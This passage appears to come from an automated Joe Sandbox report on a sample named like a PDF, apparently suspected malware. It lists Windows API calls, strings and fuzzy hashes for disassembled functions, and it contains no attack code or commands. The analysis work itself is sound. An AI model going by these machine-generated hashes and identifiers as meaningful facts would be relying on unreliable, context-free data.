                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8EE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD90A
                                                    • DeleteObject.GDI32(00000000), ref: 003BD91C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                                    • Instruction ID: ec38a6e1bfc075ea41da1571d9ed2c99e5e4488c14e25ae732340ee18030fb38
                                                    • Opcode Fuzzy Hash: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                                    • Instruction Fuzzy Hash: DC619A30501600DFDB279F18DD88F65B7B9FF84316F16092DE9869AA70C731B898CB44
                                                    APIs
                                                      • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                                    • GetSysColor.USER32(0000000F), ref: 0035B438
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                                    • Instruction ID: 8de47422931f62ebe96bab2a75d272ace3ad1773602fff74df708fca14600194
                                                    • Opcode Fuzzy Hash: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                                    • Instruction Fuzzy Hash: 1241CF70000100AFDB325F29DC89FB97B6AAB06732F198265FEA58E5F2D7309C45CB21
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 3e66ce0f8eb2c1c56d03534c053e0118db9c0c6c9ac98d97c991a32a09f1d8c9
                                                    • Instruction ID: 172b8f0b0b992470875c168672c03467b3ad6ea4f77b5167e345f49fa290c677
                                                    • Opcode Fuzzy Hash: 3e66ce0f8eb2c1c56d03534c053e0118db9c0c6c9ac98d97c991a32a09f1d8c9
                                                    • Instruction Fuzzy Hash: 85411EB684521CAECF66EB94DC46DDB73BCEB44300F0041E6F659A6055EA30ABE48F54
                                                    APIs
                                                    • CharLowerBuffW.USER32(003DDC00,003DDC00,003DDC00), ref: 0038D7CE
                                                    • GetDriveTypeW.KERNEL32(?,003F3A70,00000061), ref: 0038D898
                                                    • _wcscpy.LIBCMT ref: 0038D8C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                                    • Instruction ID: 8648b029220d2f3f86706916a2899ce7066e12882fc6b447143395b7ebeae0dd
                                                    • Opcode Fuzzy Hash: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                                    • Instruction Fuzzy Hash: B35160351043049FC716FF14D891EAAB7A5EF85314F10896DF99A5B2E2DB31EE09CB42
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 003493AB
                                                    • __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 00361557: _xtow@16.LIBCMT ref: 00361578
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf_xtow@16
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 1502193981-2263619337
                                                    • Opcode ID: 26eca0a390e8d36b5ebe762e82fb037ad991c071b3c14d6be800218891f7e8b5
                                                    • Instruction ID: 67362f43c870929468d10649dd781117e308f72b893b500282f5ea453fdb795e
                                                    • Opcode Fuzzy Hash: 26eca0a390e8d36b5ebe762e82fb037ad991c071b3c14d6be800218891f7e8b5
                                                    • Instruction Fuzzy Hash: 63410575500204AFDB26DF34D942FBAB7F8EF45304F20446BE64ADB592EA31E941CB14
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003AA259
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003AA260
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003AA273
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003AA27B
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003AA286
                                                    • DeleteDC.GDI32(00000000), ref: 003AA28F
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003AA299
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003AA2AD
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003AA2B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 17a90e2cd2aecfd371899d6b72444ebdbb0955584261dadb95e35115073238d5
                                                    • Instruction ID: afbf5821ba689a1e536718972d4b33848f4f852453791812b40b4415788d2396
                                                    • Opcode Fuzzy Hash: 17a90e2cd2aecfd371899d6b72444ebdbb0955584261dadb95e35115073238d5
                                                    • Instruction Fuzzy Hash: E7314F32100515ABDF225FA5DC49FEA3B6DFF0A760F110628FA19E61A0C736E821DB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 2620052-3771769585
                                                    • Opcode ID: 863e94ac8e2fd6fc16ebd67b11f122b7ae9934e2b1127143071814ab96ce05cc
                                                    • Instruction ID: cca27b9601a1d8cab78c640ee30c370fb2765821a42d9c2000c0e013e9314405
                                                    • Opcode Fuzzy Hash: 863e94ac8e2fd6fc16ebd67b11f122b7ae9934e2b1127143071814ab96ce05cc
                                                    • Instruction Fuzzy Hash: 3E11B472904215AFCB27BB60AC4BEEA77ACEF41710F0141B5F645EA091EF70EA858B50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00365047
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __gmtime64_s.LIBCMT ref: 003650E0
                                                    • __gmtime64_s.LIBCMT ref: 00365116
                                                    • __gmtime64_s.LIBCMT ref: 00365133
                                                    • __allrem.LIBCMT ref: 00365189
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003651A5
                                                    • __allrem.LIBCMT ref: 003651BC
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003651DA
                                                    • __allrem.LIBCMT ref: 003651F1
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036520F
                                                    • __invoke_watson.LIBCMT ref: 00365280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                    • Instruction ID: f9ec1f1b9db3d09277ab515e17086e1579d95ef163903d9c3ca279a566254219
                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                    • Instruction Fuzzy Hash: 7B712772A00B17ABEB269F78CC51B5AB3A8BF11364F14C239F514DB285E774D9408BD0
                                                    APIs
                                                    • _memset.LIBCMT ref: 00384DF8
                                                    • GetMenuItemInfoW.USER32(00401708,000000FF,00000000,00000030), ref: 00384E59
                                                    • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 00384E8F
                                                    • Sleep.KERNEL32(000001F4), ref: 00384EA1
                                                    • GetMenuItemCount.USER32(?), ref: 00384EE5
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00384F01
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00384F2B
                                                    • GetMenuItemID.USER32(?,?), ref: 00384F70
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00384FB6
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FCA
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FEB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                                    • Instruction ID: f8eae1773cd51c497c208419a24b1ed9b175cb637c05b9dc00d02118686e2b56
                                                    • Opcode Fuzzy Hash: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                                    • Instruction Fuzzy Hash: C9619D7190038AAFDB22EFA4D988EAEBBB8FB05308F15009DF541E7651D770AD05CB20
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A9C98
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A9C9B
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A9CBF
                                                    • _memset.LIBCMT ref: 003A9CD0
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A9CE2
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A9D5A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                                    • Instruction ID: 88c2a53fa2e5f4faf5a68c25983d6423f0ced4d6b8da4108986382003952bad3
                                                    • Opcode Fuzzy Hash: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                                    • Instruction Fuzzy Hash: 05616C75900208AFDB12DFA8CC81FEEB7B8EB09714F14456AFA05EB2A1D774A941DB50
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003794FE
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00379549
                                                    • VariantInit.OLEAUT32(?), ref: 0037955B
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0037957B
                                                    • VariantCopy.OLEAUT32(?,?), ref: 003795BE
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 003795D2
                                                    • VariantClear.OLEAUT32(?), ref: 003795E7
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 003795F4
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003795FD
                                                    • VariantClear.OLEAUT32(?), ref: 0037960F
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037961A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                                    • Instruction ID: b338a3304f8b71b133b9f1c2ceb4d15b8eec425c4d374ff84724a7bad3bf2261
                                                    • Opcode Fuzzy Hash: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                                    • Instruction Fuzzy Hash: BA413231900219AFCB16EFA5D844DDEBB79FF08355F008165F505E7261DB35EA45CBA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h??$|??
                                                    • API String ID: 2862541840-3562383994
                                                    • Opcode ID: 70f7a105ae13d9e2191974b722b46691805e6c80772ca7f4348cd0e4275ce6af
                                                    • Instruction ID: 41de248af1e503785b68e5ab88853378e9c1b47e5dcc4dad4cefc8bc0b083814
                                                    • Opcode Fuzzy Hash: 70f7a105ae13d9e2191974b722b46691805e6c80772ca7f4348cd0e4275ce6af
                                                    • Instruction Fuzzy Hash: F591AF71A00219EBDF26DFA5ED44FAEBBB8EF45710F10815AF505AB280DB709944CFA0
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CoInitialize.OLE32 ref: 0039ADF6
                                                    • CoUninitialize.OLE32 ref: 0039AE01
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,003CD8FC,?), ref: 0039AE61
                                                    • IIDFromString.OLE32(?,?), ref: 0039AED4
                                                    • VariantInit.OLEAUT32(?), ref: 0039AF6E
                                                    • VariantClear.OLEAUT32(?), ref: 0039AFCF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                     • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                                    • Instruction ID: aae4e7ea496ac5973cc8621ceccf1e6811080026b674f2cad127ac2accde5473
                                                    • Opcode Fuzzy Hash: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                                    • Instruction Fuzzy Hash: 5D618D71608B11AFDB12EF54C848B6BB7E8AF85714F104619F9869B291C770ED48CBD3
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00398168
• inet_addr.WSOCK32(?,?,?), ref: 003981AD
• gethostbyname.WSOCK32(?), ref: 003981B9
• IcmpCreateFile.IPHLPAPI ref: 003981C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00398237
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0039824D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 003982C2
• WSACleanup.WSOCK32 ref: 003982C8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
• Instruction ID: 4f8072622970bd81512a563cc2a5eb9cceadf3111dc63f91a242b99c16ba6b79
• Opcode Fuzzy Hash: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
• Instruction Fuzzy Hash: A151A3316047009FDB12AF24CC45F2AB7E8EF89710F044969FA96DB2A1DB70ED05CB41
APIs
• _memset.LIBCMT ref: 003A9E5B
• CreateMenu.USER32 ref: 003A9E76
• SetMenu.USER32(?,00000000), ref: 003A9E85
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A9F12
• IsMenu.USER32(?), ref: 003A9F28
• CreatePopupMenu.USER32 ref: 003A9F32
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A9F63
• DrawMenuBar.USER32 ref: 003A9F71
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
• Opcode ID: 9a470bbd4c3691dc63e7b324b0a4a4ea4f590b28b07b44d3fc2eb41feb7cef51
• Instruction ID: 6150e11410f8eb8504db65be49705843ac65a1964dd8909f1dc3c9c4c8c409d7
• Opcode Fuzzy Hash: 9a470bbd4c3691dc63e7b324b0a4a4ea4f590b28b07b44d3fc2eb41feb7cef51
• Instruction Fuzzy Hash: FB417874A00209AFDB12DF64D884FAABBB9FF4A305F15416AF945E7360D731A920CF90
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0038E396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038E40C
• GetLastError.KERNEL32 ref: 0038E416
• SetErrorMode.KERNEL32(00000000,READY), ref: 0038E483
Strings
Memory Dump Source
• Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
• Instruction ID: 3072312b8407c5aeda912145b0dd692ef36f72ae936478513b600388d63a3cd0
• Opcode Fuzzy Hash: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
• Instruction Fuzzy Hash: A7316135A003099FDB03EF65C845EBEB7B8EF45304F1580A5F60AEB291DB70AA01C791
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0037B98C
• GetDlgCtrlID.USER32 ref: 0037B997
• GetParent.USER32 ref: 0037B9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0037B9B6
• GetDlgCtrlID.USER32(?), ref: 0037B9BF
